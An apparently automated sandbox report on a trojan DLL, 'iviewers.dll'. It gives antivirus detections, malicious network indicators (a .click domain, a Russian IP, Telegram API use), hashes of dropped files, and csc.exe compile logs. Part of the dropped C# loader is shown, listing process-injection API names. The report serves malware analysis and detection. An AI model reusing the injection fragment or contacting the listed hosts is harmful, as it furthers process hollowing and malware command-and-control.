            [Behavior graph not reproduced. Behavior Graph ID: 1581496, Sample: iviewers.dll, Startdate: 27/12/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
iviewers.dll | 47% | ReversingLabs | Win32.Trojan.Doina |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dll | 100% | Avira | HEUR/AGEN.1300034 |
C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dll | 100% | Avira | HEUR/AGEN.1300034 |
C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dll | 100% | Avira | HEUR/AGEN.1300034 |
C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dll | 100% | Avira | HEUR/AGEN.1300034 |
C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dll | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dll | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dll | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dll | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | | high
fivenaii.click | 104.21.60.24 | true | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | | 62041 | TELEGRAMRU | false
104.21.60.24 | fivenaii.click | United States | | 13335 | CLOUDFLARENETUS | true
147.45.44.131 | unknown | Russian Federation | | 2895 | FREE-NET-ASFREEnetEU | true
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1581496
                                                                          Start date and time:2024-12-27 22:32:05 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 8m 49s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:52
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:iviewers.dll
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.expl.evad.winDLL@90/42@2/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 66.7%
                                                                          HCA Information:
                                                                          • Successful, ratio: 98%
                                                                          • Number of executed functions: 60
                                                                          • Number of non-executed functions: 132
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .dll
                                                                          • Stop behavior analysis, all processes terminated
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target RegAsm.exe, PID 2196 because there are no executed function
                                                                          • Execution Graph export aborted for target RegAsm.exe, PID 7548 because there are no executed function
                                                                          • Execution Graph export aborted for target RegAsm.exe, PID 7552 because there are no executed function
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: iviewers.dll
                                                                          Time      Type             Description
                                                                          16:32:54  API Interceptor  249x Sleep call for process: powershell.exe modified
                                                                          16:33:13  API Interceptor  24x Sleep call for process: RegAsm.exe modified
                                                                          Match    Associated Sample Name / URL    SHA 256    Detection    Threat Name    Link    Context
                                                                                              No context
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):0.34726597513537405
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Nlll:Nll
                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                              Malicious:false
                                                                                              Preview:@...e...........................................................
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):1576
                                                                                              Entropy (8bit):5.623775155351
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:CSU4y4RQmFoUeWmfmZ9tK8N/wueOjlZS5Gy7:PHyIFKL3OZ2K/YOZZ4j7
                                                                                              MD5:86FC717792178A3A80A9848160AAF423
                                                                                              SHA1:39CE5F1B9F09E3F19A09E908B9AB132CA20D1C7A
                                                                                              SHA-256:22FFCE0E50CBAB1533601538CAE661ED879FAD5AF98A406C1E5306D37603892E
                                                                                              SHA-512:44E8922BBFBAC388277797B3E38340203C65C462FFF5ECF6833383D6466EC9207CFB6908FB962869E9628D9837A497D08B4CA4D88437C39B4DC500B805074808
                                                                                              Malicious:false
                                                                                              Preview:@...e..........._.....................,..............@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):11063
                                                                                              Entropy (8bit):4.547000581752388
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo66T:2oYLoH97t/Z7pgjvzf5XT
                                                                                              MD5:FAC8F0E634D8D7975A6EDC045D89AE09
                                                                                              SHA1:DD06BCC32B91D9635BFA317A5213E3C5EE86D2A0
                                                                                              SHA-256:6F5BD7F4EE85C3181E111CDC470E434875BADEDC87EFC056B8EDF5CD494FBFB2
                                                                                              SHA-512:C8D77D5FA969CC6668C25331B5933C8B98DEDEF9C2DD9DA345C3CF89D96C05CC20953486E9185390501245A12AFB5CF9F37C1B627AECE6D797F0F354F6E27CD5
                                                                                              Malicious:false
                                                                                              Preview:.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):204
                                                                                              Entropy (8bit):5.117971386349521
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:pAu+H2L/6K2wkn23fxf/VUzxszIwkn23fxf/P:p37L/6KRf5f/qQf5f/P
                                                                                              MD5:C36408FB1CF78051705F47A91CB0C09A
                                                                                              SHA1:13A728DE808AF8ACE47082414E0196C0512A755E
                                                                                              SHA-256:8DFF26476BA3D80899E0B61E66C23FD48F76B9DA0D0F6BBE38B6B19A99CB8441
                                                                                              SHA-512:5824376060D18BF112D2828AC86E52E3CB65D15C407FFDBAC0ECD4D2859CC0D7068F4E173050C9A78F1E10064CE223452B81131C356EB17C45DD86AEA781F1C4
                                                                                              Malicious:false
                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.0.cs"
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):9728
                                                                                              Entropy (8bit):4.63239134074982
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:GRH6HN4QhfNQ8q8888yYAdpRjOaAUxRa95MqBY3eN450:RNxNp9On+a95MqjS50
                                                                                              MD5:2E07277329D975F7E278EA7E34481FC1
                                                                                              SHA1:AD109EF031CB7A5E0631D021DD9DA967BD5C274C
                                                                                              SHA-256:3D83440538158BB38987574760C05745B31C219634728AF8D75EC24D242A12ED
                                                                                              SHA-512:12EFBCBD2F49C202B3A4192E33427BC2A34C2262C3E8A094B8F66EA8C3C6AC81ED5303A9592F62202601AEEF54CF3CA509EC6E7E82D3009C5D0A9A125865E704
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):702
                                                                                              Entropy (8bit):5.275776010812187
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:KJN/qR37L/6KRf5f/qQf5f/2KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRfZ/FfZ/2Kax5DqBVKVrdFAw
                                                                                              MD5:F196660A24E948E24B6F36D978436749
                                                                                              SHA1:A4F89B44B9E8A0D5DEC07E3D6180A4CD1D75EEE3
                                                                                              SHA-256:FA10E00D7D2A119DD783E7F49B8442EA923440B46969E14C24C87EFB8CFF01D4
                                                                                              SHA-512:7AD7CC52A37348A54475A89E92082C2D14FC923AE88B30C43B69883160239B290A75DB84C60236DD3C4AD563782145AF2F129FCE240799DBC549CE764BE1E941
                                                                                              Malicious:false
                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):652
                                                                                              Entropy (8bit):3.132933536665914
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygbak7YnqqDUPN5Dlq5J:+RI+ycuZhNkakSwPNnqX
                                                                                              MD5:E4E37ED2597B2A51ABA4AF7B90FE7A3E
                                                                                              SHA1:A5689306E43A96B92CD9587BA5A0AE129395BCC7
                                                                                              SHA-256:64B62A6D69CF34234733946D1FA32D49F1287396FEB0F0A697FF18C774472599
                                                                                              SHA-512:55A8CE9D0A510A3A6791E48D06FFC6D9264097D755CC6A4295C5CF2E9ED388A223510ABBCB0E8C957EA6CDD7369BA3876DE67EA8F800602EBDB370809B373CD2
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.y.j.3.5.v.5.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.y.j.3.5.v.5.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):11063
                                                                                              Entropy (8bit):4.547000581752388
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo66T:2oYLoH97t/Z7pgjvzf5XT
                                                                                              MD5:FAC8F0E634D8D7975A6EDC045D89AE09
                                                                                              SHA1:DD06BCC32B91D9635BFA317A5213E3C5EE86D2A0
                                                                                              SHA-256:6F5BD7F4EE85C3181E111CDC470E434875BADEDC87EFC056B8EDF5CD494FBFB2
                                                                                              SHA-512:C8D77D5FA969CC6668C25331B5933C8B98DEDEF9C2DD9DA345C3CF89D96C05CC20953486E9185390501245A12AFB5CF9F37C1B627AECE6D797F0F354F6E27CD5
                                                                                              Malicious:true
                                                                                              Preview:.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):204
                                                                                              Entropy (8bit):5.0543967333315605
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:pAu+H2L/6K2wkn23fxIAt0zxszIwkn23fxIA/Hn:p37L/6KRfmAt0QfmAPn
                                                                                              MD5:63C515F5C98C6A6709AF91DC4669F46C
                                                                                              SHA1:DD1CB895D54E0D14267D45DC61A73CF598C375B9
                                                                                              SHA-256:F21749976D2E932578DB02ACB792609315DF52F7952D6F69B390875C6785962E
                                                                                              SHA-512:96242190C90108A1FEECADEE3A54014B00F550D79798A876F14B42A7AC373B6AA3DA073A9B37F0C0AE53F76ECE9D4BF71338D5A5B26789C606163DB81BC7C46B
                                                                                              Malicious:false
                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.0.cs"
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):9728
                                                                                              Entropy (8bit):4.63294351731549
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:CRH6HN4QhfNQ8q8888yYAd8RjOa3UxRa95MqBYUeN459:lNxN89Oo+a95MqCS59
                                                                                              MD5:D303F3B7A4CEF4E92845AF0001BA88D8
                                                                                              SHA1:9B823F6167BB64FD27F25768A2EF1178C297B007
                                                                                              SHA-256:D312153CC7484C5EF36DDAFC0C003C79B09F3929E4F098043539CB4AD4ED7CD9
                                                                                              SHA-512:DE89063863A933F1CA30BAA4CEFEC78454ECB9D9973421EC1F1E07160570A23A3B1C52840F9B136A5C524A844B2AF320F30A799667AF7CFD6FFB6A26263E10AD
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):702
                                                                                              Entropy (8bit):5.252198366237126
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:KJN/qR37L/6KRfmAt0QfmAPuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRfmAFfmAPuKax5DqBVKVrdFf
                                                                                              MD5:1EEEF94137DC47A726D09DA5BF6C3544
                                                                                              SHA1:7DE4DF221D77769CB626EB03BD1F981FF3F53BB0
                                                                                              SHA-256:CBDEA2117AE9B71EFCAFBC2ECE7C39956BF39DF6EBD9BAC048408828BC06F481
                                                                                              SHA-512:769CAAB3F12D3AEEB67A08037461E60DA3211713C4A469747A8B563CFBEEF98E86D9D021C0C76A5B649AA812B97C6AE72E07E14F8AA46149107243C3BCEF6785
                                                                                              Malicious:false
                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):652
                                                                                              Entropy (8bit):3.121315635362584
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygllGak7YnqqrllXPN5Dlq5J:+RI+ycuZhN6lYakSrlNPNnqX
                                                                                              MD5:7CB69F8ED7B2F1B08130CF2AA90271BE
                                                                                              SHA1:DB0810E499C8B738260A657033196AD95D816A8E
                                                                                              SHA-256:FFC6123C9743E658928D4DC37621A649634875578A944C4D3AD6CF1696E25028
                                                                                              SHA-512:6D9B8018E19D9A9B42AC625C127F88CB21E25F865D31291CA916D24875E98C1C05419698BBACA614B2B0A670CE7A3E809869D305E3E4B74277CF2A5EE8E7718B
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.v.v.s.z.j.l.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.v.v.s.z.j.l.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Dec 27 23:19:23 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1328
                                                                                              Entropy (8bit):3.9926745498151295
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:HCe9E2+fmpurRfHNwKEbsmfWI+ycuZhN6lYakSrlNPNnqSqd:wmp+JOKPm+1ulta3hqSK
                                                                                              MD5:69D4BBD153FAC637F864AA31FA881B89
                                                                                              SHA1:4B453FE21CB3694103D1B03D83874F3A7736ECEA
                                                                                              SHA-256:BC06CBAE655A9CDDE648B77EDE2EDE8C751F909C9C39B80836505365740E82FE
                                                                                              SHA-512:0A38239A10DB0C508AFDA0637CC3630D0D7B715503B3A984CD5C8C2F5FEB8F2EE685851C11A4B2E6053E9E9551AEA2BBAB52843C900C1184A72EC218D7C2CBB3
                                                                                              Malicious:false
                                                                                              Preview:L....5og.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\3vvszjlk\CSC1C049BEBEBAF4B45B9D79F1CA1976831.TMP...............|.....0.*..q...........3.......C:\Users\user\AppData\Local\Temp\RES374.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.v.v.s.z.j.l.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Dec 27 23:19:19 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1328
                                                                                              Entropy (8bit):3.9852805265737694
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:HGe9E2+f7gnUXDfHhBWwKEbsmfII+ycuZhNAGakSRXPNnqSqd:k7gUzxKPmg1ulAGa3RFqSK
                                                                                              MD5:2CD6DAB14580E9298E0E925AD5469E1E
                                                                                              SHA1:337F603B41278D9885BE35C28906CDA212E1674D
                                                                                              SHA-256:D1F92BD119F639A409431C877C1B8B7A2489BE8FCD4D0E928DE04F6FD3B89AEF
                                                                                              SHA-512:97FF2B76D5E7B3EE5B3D495FC4E34FC5B15AB4E06A7C421C118A4517D434FC79F70134EF0C62946A07AF81FA7B08A5C005C239721448622CF2E878AE46E69FC2
                                                                                              Malicious:false
                                                                                              Preview:L....5og.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\wzlesmvi\CSC11B817DA9D55460CBF45133E7BAA649F.TMP.................Q..#P...i..'4G..........4.......C:\Users\user\AppData\Local\Temp\RESF461.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.z.l.e.s.m.v.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Dec 27 23:19:19 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1328
                                                                                              Entropy (8bit):4.002801435985318
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:HGe9EuZf/YXDfHhCQwKEbsmfII+ycuZhNXakSJPNnqSqd:DB/YzE/KPmg1ulXa3rqSK
                                                                                              MD5:4449885B2B938D5C9E7553452742683E
                                                                                              SHA1:48546878C0D2E8CB17EFDBE53A272C13AA5932CD
                                                                                              SHA-256:51DB505B71FB7D39D10D5FDABC0DB830A32D7D1D87D5C4675D9E1C263534E6C6
                                                                                              SHA-512:08FE7D8EE4975EEC087C02ED12A2863D0A9530030A9DDC8DA9B34EB9DD2AFF224726021424F8A95FB4C926D2F2C329BCDF934B352612031BBD99CBB13A72248D
                                                                                              Malicious:false
                                                                                              Preview:L....5og.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\xyq5akbp\CSC3C74FAAA7254A90B38FFB13CA21DCB4.TMP................!.3`..~+...Q..J...........4.......C:\Users\user\AppData\Local\Temp\RESF462.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.y.q.5.a.k.b.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Dec 27 23:19:19 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1328
                                                                                              Entropy (8bit):3.9999768763669326
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:HGe9E2+fZ7AXDfHhmwKEbsmfII+ycuZhNkakSwPNnqSqd:kOzvKPmg1ulka3oqSK
                                                                                              MD5:64C5F66D9128E76B40136F8D4F6C46D9
                                                                                              SHA1:4A9D053A72227E690C724377E20E8A47203391C2
                                                                                              SHA-256:28064F0A7A59D8DBF737F766750E6569BCFEB614FF3EB32C96581598F80FD796
                                                                                              SHA-512:1FE141AF4567F485818A29CE14C100DDCEC5FFACC23389B031CB71A9D304A220E553A0CB534B0833774BE008A4CCB2DAEEF3BBFE1FED038D705E276A70A1FD20
                                                                                              Malicious:false
